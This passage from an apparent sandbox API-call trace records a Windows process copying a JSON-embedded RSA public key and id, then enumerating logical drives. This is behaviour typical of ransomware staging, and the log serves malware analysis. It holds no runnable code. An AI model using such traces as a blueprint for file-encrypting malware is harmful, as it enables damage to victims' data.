KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.247] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.248] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.248] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.248] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0204.248] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32871c8 | out: hHeap=0x750000) returned 1 [0204.248] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.248] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x448) returned 0x3284f50 [0204.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98ea778, cbMultiByte=-1, lpWideCharStr=0x3284f50, cchWideChar=548 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 548 [0204.248] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0204.248] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0204.248] lstrlenA (lpString="\",\"id\":\"") returned 8 [0204.248] lstrcpyA (in: lpString1=0x98eab78, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0204.248] lstrcpyA (in: lpString1=0x98ea778, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0204.248] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.248] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.248] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.248] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.248] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.248] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.249] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.250] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.250] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d4a8 [0204.250] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x854) returned 0x325e940 [0204.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323d4a8, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1066 | out: lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 43 [0204.250] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3286578 [0204.250] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.250] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d4a8 | out: hHeap=0x750000) returned 1 [0204.250] lstrcpyW (in: lpString1=0x521cf0, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0204.250] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286578 | out: hHeap=0x750000) returned 1 [0204.250] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0204.250] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x56) returned 0x32080d0 [0204.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98ea778, cbMultiByte=-1, lpWideCharStr=0x32080d0, cchWideChar=43 | out: lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 43 [0204.250] lstrcpyW (in: lpString1=0x521cf0, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0204.250] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0204.250] lstrlenW (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned 40 [0204.257] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3256d70 | out: hHeap=0x750000) returned 1 Thread: id = 155 os_tid = 0x1cc [0205.522] timeGetTime () returned 0x11380d3 [0205.522] GetLastError () returned 0x54f [0205.522] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3bc) returned 0x3256d70 [0205.522] GetCurrentThreadId () returned 0x1cc [0205.522] SetLastError (dwErrCode=0x54f) [0205.522] Sleep (dwMilliseconds=0x0) [0205.525] Sleep (dwMilliseconds=0x3e8) [0209.449] GetLogicalDrives () returned 0x4 [0209.449] SetErrorMode (uMode=0x1) returned 0x0 [0209.449] PathFileExistsA (pszPath="C:\\") returned 1 [0209.449] SetErrorMode (uMode=0x0) returned 0x1 [0209.449] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0209.450] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x806) returned 0x32ef368 [0209.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x397fe60, cbMultiByte=-1, lpWideCharStr=0x32ef368, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0209.450] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.450] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.450] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x773580 [0209.450] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.450] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.450] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.450] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x32ef368 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ef368 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef368 | out: hHeap=0x750000) returned 1 [0209.451] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.451] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.452] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.452] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.452] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.452] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.452] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.452] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.452] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.452] 